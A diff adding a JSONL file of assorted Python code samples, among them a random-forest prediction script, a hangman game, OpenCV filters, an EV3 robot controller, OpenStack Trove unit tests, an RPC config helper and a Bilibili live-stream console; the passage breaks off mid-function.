diff --git "a/5165.jsonl" "b/5165.jsonl" new file mode 100644--- /dev/null +++ "b/5165.jsonl" @@ -0,0 +1,733 @@ +{"seq_id":"105133039","text":"# Random forest\n# got some code from here: \n# http://blog.yhat.com/posts/random-forests-in-python.html\n#\n\nimport MySQLdb\nimport numpy as np\nimport pandas as pd \nimport pickle\nfrom sklearn.ensemble import RandomForestClassifier\n\ndb = MySQLdb.connect(\"localhost\", \"python\", \"password\", \"talkingdata\")\n\ndef run_query(table, startRow, limit):\n \"\"\"runs a mysql query and returns a data frame\"\"\"\n query = \"\"\"SELECT os, ip, device, \\\n channel, app, \\\n YEAR(click_time) AS year, \\\n MONTH(click_time) AS month, \\\n DAY(click_time) AS date, \\\n DAYOFWEEK(click_time) AS day, \\\n HOUR(click_time) AS hour, \\\n MINUTE(click_time) as minute\"\"\"\n\n if 'train' in table:\n query = query + \"\"\", is_attributed\"\"\"\n else:\n query = query + \"\"\", click_id\"\"\"\n\n query = query + \"\"\" FROM \"\"\" + table + \\\n \"\"\" LIMIT \"\"\" + str(limit) + \\\n \"\"\" OFFSET \"\"\" + str(startRow) + \"\"\";\"\"\"\n db.query(query)\n dbResult = db.store_result()\n dbFetched = dbResult.fetch_row(maxrows = 0, how = 2)\n queryDF = pd.DataFrame.from_records(dbFetched)\n return queryDF\n\ntotalFits = 93\nallFits = []\nfor i in range(totalFits):\n allFits.append(pickle.load(open('processing/submission2/rfc' + \n str(i + 1) + '.sav', 'rb')))\n\n# Predicting\n\nmaxRows = 18790469\ntrainingRows = 500000\n\npredHeaders = pd.DataFrame(columns = ['click_id'] + \n list(range(len(allFits))))\npredHeaders.to_csv('processing/submission2/allPreds.csv', index = False)\n\nfor i in range(0, maxRows, trainingRows):\n print(str(i) + '/' + str(maxRows))\n #Each list is the predictions for one fit\n allPreds = [list() for i in allFits] \n test = run_query('test', i, trainingRows)\n clickID = list(test['test.click_id'])\n test.drop('test.click_id', axis = 1, inplace = True)\n for i in range(len(allFits)):\n 
allPreds[i].extend(allFits[i].predict(test))\n allPredsDF = pd.DataFrame(pd.Series(clickID), columns = ['click_id'])\n for i in range(len(allPreds)):\n allPredsDF[str(i)] = pd.Series(allPreds[i])\n with open('processing/submission2/allPreds.csv', 'a') as f:\n allPredsDF.to_csv(f, header = False, index = False)\n\n\n\n\n","sub_path":"submission2_predicting.py","file_name":"submission2_predicting.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276742906","text":"import random\n\nHANGMANPICS = ['''\n +---+\n | |\n |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========''']\n\nwords = 'ant baboon badger bat bear beaver camel cat clam cobra cougar coyote crow deer dog donkey duck eagle ferret fox frog goat goose hawk lion lizard llama mole monkey moose mouse mule newt otter owl panda parrot pigeon python rabbit ram rat raven rhino salmon seal shark sheep skunk sloth snake spider stork swan tiger toad trout turkey turtle weasel whale wolf wombat zebra'.split()\n\n\nMissed_letters = 'Missed letters: '\nsecret_word = words[random.randint(0,len(words)-1)]\nblank_letters = list(\"_ \"*len(secret_word))\nwrong_guesses = 0\n\n\nprint(\"H A N G M A N\")\n\ngameOn = True\n\nwhile gameOn:\n print(secret_word)\n print(HANGMANPICS[wrong_guesses])\n if wrong_guesses == 6:\n print(\"Sorry, you ran out of guesses! Game over!\")\n break\n print(Missed_letters)\n print(''.join(blank_letters))\n stripped_word = [x for x in blank_letters if x.strip()]\n if secret_word == ''.join(stripped_word):\n print(\"Good work! 
You won!\")\n break\n guess = input(\"Guess a letter.\\n\")\n if len(guess) != 1:\n guess = input(\"Enter a single letter, please.\\n\")\n if guess not in secret_word:\n wrong_guesses += 1\n Missed_letters += guess\n else:\n if secret_word.count(guess) > 1:\n word_loc = secret_word.find(guess)\n while blank_letters[word_loc*2] == guess:\n word_loc = secret_word.find(guess, word_loc+1)\n else:\n blank_letters[word_loc*2] = guess\n else:\n word_loc = secret_word.find(guess)\n blank_letters[word_loc*2] = guess\n\n \n \n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297041699","text":"import numpy as np\nimport cv2\n\n######## 四个不同的滤波器 #########\nimg = cv2.imread('test.jpg')\n# 平滑线性滤波滤波\nimg_mean = cv2.blur(img, (5, 5))\n# 高斯滤波\nimg_Guassian = cv2.GaussianBlur(img, (5, 5), 0)\n# 中值滤波\nimg_median = cv2.medianBlur(img, 5)\n# 双边滤波\nimg_bilater = cv2.bilateralFilter(img, 9, 75, 75)\n","sub_path":"chapter-2/2.1.2-filter.py","file_name":"2.1.2-filter.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137326600","text":"\"\"\"\nMini-application: Buttons on a Tkinter GUI tell the robot to:\n - Go forward at the speed given in an entry box.\n\nAlso: responds to Beacon button-presses by beeping, speaking.\n\nThis module runs on the ROBOT.\nIt uses MQTT to RECEIVE information from a program running on the LAPTOP.\n\nAuthors: David Mutchler, his colleagues, and Jeremy Roy.\n\"\"\"\n\nimport rosebotics_new as rb\nimport time\nimport mqtt_remote_method_calls as com\nimport ev3dev.ev3 as ev3\n\n\ndef main():\n robot = rb.Snatch3rRobot()\n\n rc = RemoteControlEtc(robot)\n mqtt_client = com.MqttClient(rc)\n rc.mqtt_client = mqtt_client\n mqtt_client.connect_to_pc()\n\n while True:\n if robot.beacon_button_sensor.is_top_red_button_pressed():\n 
ev3.Sound.beep().wait()\n if robot.beacon_button_sensor.is_top_blue_button_pressed():\n ev3.Sound.speak('Hello, how are you?')\n time.sleep(0.01) # For the delegate to do its work\n\n\nclass RemoteControlEtc(object):\n def __init__(self, robot):\n \"\"\"\n Stores the robot.\n :type robot: rb.Snatch3rRobot\n \"\"\"\n self.robot = robot\n self.mqtt_client = None\n\n def go_forward(self, speed_string):\n \"\"\"makes the robot go forward at the given speed\"\"\"\"\"\n print('telling the robot to start moving at', speed_string)\n speed = int(speed_string)\n self.robot.drive_system.start_moving(speed, speed)\n\n def follow_path(self):\n while True:\n x = self.robot.color_sensor.get_reflected_intensity() # 100 in intensity is white, 1 through 4 is black\n print(x)\n if x <= 10:\n self.robot.drive_system.start_moving(left_wheel_duty_cycle_percent=45,\n right_wheel_duty_cycle_percent=45)\n if x >= 10: # go counterclockwise in this case\n self.robot.drive_system.start_moving(left_wheel_duty_cycle_percent=0, right_wheel_duty_cycle_percent=50)\n\n if x >= 20 and x <= 25:\n self.robot.drive_system.stop_moving()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.speak('I found blue!')\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n self.robot.drive_system.spin_in_place_degrees(360)\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(3)\n break\n\n if x >= 74 and x <= 80:\n self.robot.drive_system.stop_moving()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.speak('I found red!')\n 
self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n self.robot.drive_system.spin_in_place_degrees(720)\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(3)\n break\n\n if x >= 15 and x <= 19:\n self.robot.drive_system.stop_moving()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.speak('I found green!')\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(1.5)\n ev3.Sound.beep()\n self.robot.drive_system.spin_in_place_degrees(180)\n self.mqtt_client.send_message('handle_increment_progress_bar')\n time.sleep(3)\n break\n\n if self.robot.proximity_sensor.get_distance_to_nearest_object_in_inches() <= 4:\n ev3.Sound.beep()\n ev3.Sound.speak('There is something in my way!')\n ev3.Sound.beep()\n\n def path_by_color(self):\n x = self.robot.color_sensor.get_reflected_intensity()\n\n if x >= 20 and x <= 25:\n ev3.Sound.speak('I found blue!')\n self.robot.drive_system.spin_in_place_degrees(360)\n\n if x >= 74 and x <= 80:\n ev3.Sound.speak('I found red!')\n self.robot.drive_system.spin_in_place_degrees(720)\n\n if x >= 15 and x <= 19:\n ev3.Sound.speak('I found green!')\n self.robot.drive_system.spin_in_place_degrees(180)\n\n\nmain()\n","sub_path":"src/Capstone_royjm_runs_on_robot.py","file_name":"Capstone_royjm_runs_on_robot.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"600727196","text":"# Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\nimport sqlalchemy.engine.base\nimport testtools\nimport mockito\nfrom mockito import when, never\nimport mockito.matchers as matchers\nimport ConfigParser\nimport sqlalchemy\nimport keystoneclient.v2_0.client as ksclient\n\nimport trove.common.context as context\nimport trove_ext.mappedid.mapped_id_manager as mapmgr\nimport trove_ext.mappedid.models as models\n\n\ndef query_contains(query_string):\n return QueryContains(query_string)\n\n\nclass QueryContains(matchers.Matcher):\n def __init__(self, sub):\n self.sub = sub\n\n def matches(self, arg):\n return self.sub and len(self.sub) > 0 and str(arg).find(self.sub) > -1\n\n def __repr__(self):\n return \"\" % self.sub\n\n\nclass TestMappedIdManager(testtools.TestCase):\n def setUp(self):\n super(TestMappedIdManager, self).setUp()\n # stub config\n when(ConfigParser.ConfigParser).get('MAPPED_ID').thenReturn(None)\n when(ConfigParser.ConfigParser).get('MAPPED_ID',\n mockito.any()).thenReturn(\"*\")\n when(ConfigParser.ConfigParser).get(\n 'KEYSTONE', 'keystone_admin_role').thenReturn(\"fake_admin_role_id\")\n # stub sql engine\n self.mock_conn = mockito.mock(sqlalchemy.engine.base.Connection)\n mock_engine = mockito.mock(sqlalchemy.engine.Engine)\n when(sqlalchemy).create_engine(\n mockito.any(),\n pool_recycle=7200,\n echo=True,\n listeners=mockito.any([])).thenReturn(mock_engine)\n when(mock_engine).connect().thenReturn(self.mock_conn)\n # stub db query results\n self.mapped_tenant_user_result = mockito.mock(\n sqlalchemy.engine.base.ResultProxy)\n self.mapped_tenant_result = mockito.mock(\n 
sqlalchemy.engine.base.ResultProxy)\n self.mapped_user_result = mockito.mock(\n sqlalchemy.engine.base.ResultProxy)\n # stub keystone\n mock_ksclient = mockito.mock(ksclient.Client)\n when(ksclient).Client(\n username=mockito.any(),\n password=mockito.any(),\n tenant_name=mockito.any(),\n auth_url=mockito.any(),\n insecure=mockito.any()).thenReturn(mock_ksclient)\n self.mock_role_mgr = mockito.mock(ksclient.roles.RoleManager)\n mock_ksclient.roles = self.mock_role_mgr\n when(self.mock_role_mgr).find(name=\"_member_\").thenReturn(\n ksclient.roles.Role(self.mock_role_mgr,\n {'id': '1'},\n True))\n self.mock_tenant_mgr = mockito.mock(ksclient.tenants.TenantManager)\n mock_ksclient.tenants = self.mock_tenant_mgr\n self.mock_user_mgr = mockito.mock(ksclient.users.UserManager)\n mock_ksclient.users = self.mock_user_mgr\n\n def tearDown(self):\n super(TestMappedIdManager, self).tearDown()\n # grrr this son-gun caused all sorts of interesting problems\n mapmgr.ENGINE = None\n mockito.unstub()\n models.ENGINE = None\n\n def _expect_no_db_mapped_user(self, tenant='123'):\n when(self.mock_conn).execute(\n query_contains(\n \"%s = \\'%s\\'\" % (models.TENANT_ID, tenant))).thenReturn(\n self.mapped_tenant_user_result)\n self.mapped_tenant_user_result.rowcount = 0\n\n def _expect_no_db_tenant(self, tenant='123'):\n mapped_tenant_name = mapmgr.MappedIdManager._get_mapped_tenant_name(\n tenant)\n self._stub_tenant_db_execute(mapped_tenant_name)\n self.mapped_tenant_result.rowcount = 0\n\n def _stub_tenant_db_execute(self, mapped_tenant_name):\n when(self.mock_conn).execute(\n query_contains(\"%s = \\'%s\\'\" % (\n models.MAPPED_TENANT_NAME,\n mapped_tenant_name))).thenReturn(\n self.mapped_tenant_result)\n\n def _expect_db_tenant(self, tenant=\"123\",\n mapped_tenant_id=\"fake_tenant_id\"):\n mapped_tenant_name = mapmgr.MappedIdManager._get_mapped_tenant_name(\n tenant)\n self._stub_tenant_db_execute(mapped_tenant_name)\n self.mapped_tenant_result.rowcount = 1\n 
when(self.mapped_tenant_result).fetchone().thenReturn(\n {models.MAPPED_TENANT_NAME: mapped_tenant_name,\n models.MAPPED_TENANT_ID: mapped_tenant_id}\n )\n\n def stub_user_db_execute(self, mapped_user_name):\n when(self.mock_conn).execute(\n query_contains(\n \"%s = \\'%s\\'\" % (\n models.MAPPED_USER_NAME, mapped_user_name))).thenReturn(\n self.mapped_user_result)\n\n def expect_no_db_user(self, user='abc'):\n self.mapped_user_result.rowcount = 0\n mapped_user_name = mapmgr.MappedIdManager._get_mapped_user_name(user)\n self.stub_user_db_execute(mapped_user_name)\n\n def _expect_db_user(self, user=\"abc\",\n mapped_user_id=\"fake_user_id\"):\n mapped_user_name = mapmgr.MappedIdManager._get_mapped_user_name(user)\n self.stub_user_db_execute(mapped_user_name)\n self.mapped_user_result.rowcount = 1\n when(self.mapped_user_result).fetchone().thenReturn(\n {models.MAPPED_USER_NAME: mapped_user_name,\n models.MAPPED_USER_ID: mapped_user_id}\n )\n\n def _expect_ks_create_tenant(self, mapped_tenant_id=\"t_1\"):\n when(self.mock_tenant_mgr).create(\n mockito.any(str), mockito.any(str)).thenReturn(\n ksclient.tenants.Tenant(self.mock_tenant_mgr,\n {\"id\": mapped_tenant_id}, True))\n\n def _expect_ks_create_user(self, mapped_user_id='u_1'):\n when(self.mock_user_mgr).create(\n mockito.any(),\n mockito.any(), \"\").thenReturn(\n ksclient.users.User(self.mock_user_mgr, {'id': mapped_user_id},\n True))\n\n def _expect_ks_add_role(self, role_id='1'):\n when(self.mock_role_mgr).add_user_role(\n mockito.any(str),\n role_id, mockito.any(str)).thenReturn(None)\n\n def test_init_existing_tenant_new_user(self):\n tenant = '123'\n mapped_tenant_id = \"fake_tenant_id\"\n user = 'abc'\n mapped_user_id = \"u_1\"\n self._expect_no_db_mapped_user(tenant=tenant)\n self._expect_db_tenant(tenant=tenant,\n mapped_tenant_id=mapped_tenant_id)\n self.expect_no_db_user(user=user)\n self._expect_ks_create_user(mapped_user_id)\n self._expect_ks_add_role()\n # execute\n 
mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_existing_tenant_new_user_admin(self):\n tenant = '123'\n mapped_tenant_id = \"t_1\"\n mapped_user_id = \"u_1\"\n self._expect_no_db_mapped_user()\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self.expect_no_db_user()\n self._expect_ks_create_user(mapped_user_id)\n member_role_id = \"1\"\n admin_role_id = \"fake_admin_role_id\"\n self._expect_ks_add_role(member_role_id)\n self._expect_ks_add_role(admin_role_id)\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user='abc',\n is_admin=True))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id,\n member_role_id,\n mapped_tenant_id)\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id,\n admin_role_id,\n mapped_tenant_id)\n\n def test_init_existing_tenant_existing_user_no_role(self):\n tenant = '123'\n user = 'abc'\n mapped_tenant_id = 't_1'\n mapped_user_id = 'u_1'\n self._expect_no_db_mapped_user()\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self._expect_db_user(user, mapped_user_id)\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_existing_tenant_existing_user_no_role_rollback(self):\n tenant = '123'\n user = 'abc'\n mapped_tenant_id = 't_1'\n mapped_user_id = 'u_1'\n self._expect_no_db_mapped_user()\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self._expect_db_user(user, mapped_user_id)\n when(self.mock_role_mgr).add_user_role(\n mockito.any(str),\n '1', mockito.any(str)).thenRaise(\n ksclient.exceptions.ClientException(500, \"Uh oh\",\n \"something went wrong\"))\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # 
verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n mockito.verify(self.mock_conn).execute(query_contains(\"DELETE FROM\"))\n\n def test_init_existing_tenant_existing_user_existing_role(self):\n tenant = '123'\n user = 'abc'\n mapped_tenant_id = 't_1'\n mapped_user_id = \"u_1\"\n self._expect_no_db_mapped_user(tenant)\n self._expect_db_tenant(tenant, mapped_tenant_id)\n self._expect_db_user(user, mapped_user_id)\n when(self.mock_role_mgr).add_user_role(\n mapped_user_id,\n '1', mapped_tenant_id).thenRaise(ksclient.exceptions.Conflict(409))\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_new_tenant_existing_user(self):\n tenant = '123'\n mapped_tenant_id = \"t_1\"\n user = 'abc'\n mapped_user_id = 'u_1'\n # not even sure this would ever happen\n self._expect_no_db_mapped_user()\n self._expect_no_db_tenant(tenant)\n self._expect_db_user(user, mapped_user_id)\n self._expect_ks_create_tenant(mapped_tenant_id)\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_user_mgr, never).create(mockito.any(),\n mockito.any(), \"\")\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n mapped_tenant_id)\n\n def test_init_new_tenant_existing_user_tenant_exists_in_keystone(self):\n tenant = '123'\n user = 'abc'\n mapped_user_id = 'u_1'\n self._expect_no_db_mapped_user()\n self._expect_no_db_tenant(tenant=tenant)\n self._expect_db_user(user=user, mapped_user_id=mapped_user_id)\n when(self.mock_tenant_mgr).create(\n mockito.any(str), mockito.any(str)).thenRaise(\n ksclient.exceptions.Conflict(409))\n when(ConfigParser.ConfigParser).getfloat(\n 'MAPPED_ID',\n 'wait_time_for_user_mapping').thenReturn(2)\n 
when(self.mock_tenant_mgr).find(name=mockito.any(str)).thenReturn(\n ksclient.tenants.Tenant(self.mock_tenant_mgr, {'id': 't_1'}, True))\n self._expect_ks_add_role()\n # execute\n mapmgr.MappedIdManager(context.TroveContext(tenant=tenant, user=user))\n # verify\n mockito.verify(self.mock_role_mgr).add_user_role(mapped_user_id, \"1\",\n \"t_1\")\n","sub_path":"trove_ext/tests/unittests/mappedid/test_mapped_id_manager.py","file_name":"test_mapped_id_manager.py","file_ext":"py","file_size_in_byte":12812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323963292","text":"import importlib\n\n\ndef rpc(f):\n \"\"\"\n 所有被 rpc 装饰的函数都会在 Configuration 初始化的时候被绑定到 RPCServer 继承的类里\n :case\n @rpc\n def add(x, y):\n return x + y\n \"\"\"\n\n def wrapper(_f):\n return _f\n\n return wrapper(f)\n\n\nclass Configuration(object):\n \"\"\"\n 配置类\n \"\"\"\n\n def __init__(self, config, *args, **kwargs):\n \"\"\"\n 初始化\n :param config: 配置模块,str 类型\n :param args: 预留参数\n :param kwargs: 预留参数\n \"\"\"\n try:\n self._config = __import__(config)\n except Exception:\n raise Exception(\"配置名称不正确\")\n self._tasks = {}\n self._initial_config()\n\n def _initial_config(self):\n \"\"\"\n 初始化基础配置\n \"\"\"\n if not hasattr(self._config, 'INSTALLED_APPS'):\n raise Exception(\"配置中需要有 INSTALLED_APPS 参数\")\n for _app in self._config.INSTALLED_APPS:\n try:\n _module = __import__(_app)\n if hasattr(_module, 'task'):\n for func_name in dir(getattr(_module, 'task')):\n if not func_name.startswith('__') and func_name != 'rpc':\n self._append_task(_app, func_name)\n except Exception:\n raise Exception(\"不存在 {} 这个模块\".format(_app))\n\n @property\n def tasks(self):\n return self._tasks\n\n def _append_task(self, module_name, task_name):\n if module_name in self._tasks:\n self._tasks[module_name].append(task_name)\n else:\n self._tasks[module_name] = [task_name, ]\n\n def bind_class(self, server_class):\n \"\"\"\n 将所有 rpc 装饰的任务绑定到 server_class 类里\n :param 
server_class: RPCServer 继承的类\n \"\"\"\n for module_name in self._tasks:\n for func_name in self._tasks[module_name]:\n module = importlib.import_module(module_name, __package__)\n setattr(server_class, func_name, staticmethod(getattr(module, func_name)))\n","sub_path":"mprpc_config/rpc_config.py","file_name":"rpc_config.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"590065327","text":"import utils\nfrom statistics import Statistics\nfrom connect import connect\nfrom printer import Printer\nimport threading\nimport asyncio\n\ndef guide_of_console():\n print('___________________________')\n print('| 欢迎使用本控制台 |')\n print('|1 输出本次的参与抽奖统计 |')\n print('|2 输出本次的抽奖结果统计 |')\n print('|3 查看目前拥有礼物的统计 |')\n print('|4 查看持有勋章状态 |')\n print('|5 获取直播个人的基本信息 |')\n print('|6 检查今日任务的完成情况 |')\n print('|7 模拟安卓客户端发送弹幕 |')\n print('|8 模拟电脑网页端发送弹幕 |')\n print('|9 直播间的长短号码的转化 |')\n print(' ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄')\n \n\ndef preprocess_send_danmu_msg_andriod():\n msg = input('请输入要发送的信息:')\n roomid = input('请输入要发送的房间号:')\n Biliconsole().append2list_console([[msg, int(roomid)], utils.send_danmu_msg_andriod])\n \ndef preprocess_send_danmu_msg_web():\n msg = input('请输入要发送的信息:')\n roomid = input('请输入要发送的房间号:')\n Biliconsole().append2list_console([[msg, int(roomid)], utils.send_danmu_msg_web])\n\ndef preprocess_check_room():\n roomid = input('请输入要转化的房间号:')\n Biliconsole().append2list_console([[roomid], utils.check_room])\n\ndef process_send_gift_web():\n Biliconsole().append2list_console([[True], utils.fetch_bag_list])\n bagid = input('请输入要发送的礼物编号:')\n # print('是谁', giftid)\n giftnum = input('请输入要发送的礼物数目:')\n roomid = input('请输入要发送的房间号:')\n Biliconsole().append2list_console([[roomid, [[False, bagid],utils.fetch_bag_list], giftnum, bagid],utils.send_gift_web])\n \ndef preprocess_change_danmuji_roomid():\n roomid = input('请输入roomid')\n connect().reconnect(roomid)\n\ndef 
change_printer_dic_user():\n new_words = input('弹幕控制')\n if new_words == 'T':\n Printer().dic_user['print_control']['弹幕'] = True\n else:\n Printer().dic_user['print_control']['弹幕'] = False\ndef preprocess_fetch_liveuser_info():\n real_roomid = input('请输入roomid')\n Biliconsole().append2list_console([[real_roomid], utils.fetch_liveuser_info])\n \n\noptions ={\n '1': Statistics().getlist,\n '2': Statistics().getresult,\n '3': utils.fetch_bag_list,#async\n '4': utils.fetch_medal,#async\n '5': utils.fetch_user_info,#async\n '6': utils.check_taskinfo,#async\n '7': preprocess_send_danmu_msg_andriod,#input async\n '8': preprocess_send_danmu_msg_web,#input async\n '9': preprocess_check_room,#input async\n '10': process_send_gift_web,#input async !!!\n '11': preprocess_change_danmuji_roomid,\n '12': change_printer_dic_user,\n '13': preprocess_fetch_liveuser_info,\n 'help': guide_of_console\n}\n\ndef return_error():\n print('命令无法识别,请重新输入')\n\ndef controler():\n while True:\n x = input('')\n # input and async\n if x == ['7', '8', '9', '10', '13']:\n # func = options.get(x, return_error)\n args, func = options.get(x, return_error)()\n #print(args)\n #Biliconsole().append2list_console(answer)\n # async\n elif x in ['3', '4', '5', '6']:\n answer = options.get(x, return_error)\n Biliconsole().append2list_console(answer)\n # normal\n else:\n options.get(x, return_error)()\n \nclass Biliconsole():\n instance = None\n\n def __new__(cls, *args, **kw):\n if not cls.instance:\n cls.instance = super(Biliconsole, cls).__new__(cls, *args, **kw)\n cls.instance.list_console = []\n cls.lock = threading.Lock()\n return cls.instance\n \n def append2list_console(self, request):\n self.lock.acquire()\n self.list_console.append(request)\n self.lock.release()\n \n async def run(self):\n while True:\n len_list_console = len(self.list_console)\n tasklist = []\n for i in self.list_console:\n if isinstance(i, list):\n # 对10号单独简陋处理\n for j in range(len(i[0])):\n if isinstance(i[0][j], list):\n i[0][j] = 
await i[0][j][1](*(i[0][j][0]))\n task = asyncio.ensure_future(i[1](*i[0]))\n else:\n task = asyncio.ensure_future(i())\n tasklist.append(task)\n if tasklist: \n await asyncio.wait(tasklist, return_when=asyncio.ALL_COMPLETED)\n #print('本批次结束')\n else:\n #print('本批次轮空')\n pass\n \n if len_list_console == 0:\n await asyncio.sleep(1)\n else:\n self.lock.acquire()\n del self.list_console[:len_list_console]\n self.lock.release()\n await asyncio.sleep(0.3)\n \n \n \n \n \n \n","sub_path":"biliconsole.py","file_name":"biliconsole.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403853160","text":"from baconian.common.plotter import Plotter\nimport glob\nimport os\nimport sys\nfrom baconian.common.error import *\nimport json_tricks as json\nimport pandas as pd\nfrom baconian.common.files import *\nfrom collections import OrderedDict\n\n\nclass SingleExpLogDataLoader(object):\n def __init__(self, exp_root_dir: str):\n self._root_dir = exp_root_dir\n check_file(path=os.path.join(exp_root_dir, 'record', 'final_status.json')) # dir list\n check_file(path=os.path.join(exp_root_dir, 'record', 'global_config.json'))\n self.final_status = load_json(file_path=os.path.join(exp_root_dir, 'record', 'final_status.json'))\n self.global_config = load_json(file_path=os.path.join(exp_root_dir, 'record', 'global_config.json'))\n # check the existence of json files?\n\n def load_record_data(self, agent_log_dir_name, algo_log_dir_name, env_log_dir_name):\n # todo maybe add a verbose mode to load all log\n\n agent_log_dir = os.path.join(self._root_dir, agent_log_dir_name)\n algo_log_dir = os.path.join(self._root_dir, algo_log_dir_name)\n check_dir(agent_log_dir)\n check_dir(algo_log_dir)\n\n def init(self):\n pass\n\n def plot_res(self, sub_log_dir_name, key, index, mode=('line', 'hist', 'scatter'),\n average_over=1, file_name=None, save_format='png',\n ):\n log_name = 
os.path.join(self._root_dir, 'record', sub_log_dir_name, 'log.json')\n f = open(log_name, 'r')\n res_dict = json.load(f)\n key_list = res_dict[key]\n key_value = OrderedDict()\n key_vector = []\n index_vector = []\n for record in key_list:\n num_index = int(record[index])\n index_vector.append(num_index)\n key_vector.append(record[\"log_val\"])\n key_value[index] = index_vector\n key_value[key] = key_vector\n data = pd.DataFrame.from_dict(key_value) # Create dataframe for plotting\n row_num = data.shape[0]\n column_num = data.shape[1]\n data_new = data\n\n # Calculate mean value in horizontal axis, incompatible with histogram mode\n if average_over != 1:\n if mode != 'histogram':\n new_row_num = int(row_num / average_over)\n data_new = data.head(new_row_num).copy()\n data_new.loc[:, index] = data_new.loc[:, index] * average_over\n for column in range(1, column_num):\n for i in range(new_row_num):\n data_new.iloc[i, column] = data.iloc[i * average_over: i * average_over + average_over,\n column].mean()\n\n if mode == 'histogram':\n histogram_flag = True\n data_new = data.iloc[:, 1:].copy()\n else:\n histogram_flag = False\n if mode == 'scatter':\n scatter_flag = True\n else:\n scatter_flag = False\n\n Plotter.plot_any_key_in_log(data=data_new, index=index, key=key,\n sub_log_dir_name=sub_log_dir_name,\n scatter_flag=scatter_flag, save_flag=True,\n histogram_flag=histogram_flag, save_path=os.path.join(self._root_dir),\n save_format=save_format, file_name=file_name)\n\n\n# TODO\n# key and index, log given = plot figure(curve), average or 10, or set a range\n# normalisation\n\nclass MultipleExpLogDataLoader(object):\n def __init__(self, exp_root_dir_list: str, num: int):\n self._root_dir = exp_root_dir_list\n self.num = num\n for i in range(num):\n exp_root_dir = exp_root_dir_list + \"/exp_\" + str(i)\n SingleExpLogDataLoader(exp_root_dir)\n\n def plot_res(self, key, index, sub_log_dir_name: str, mode=('plot', 'hist', 'scatter'), average_over=1,\n save_format='png', 
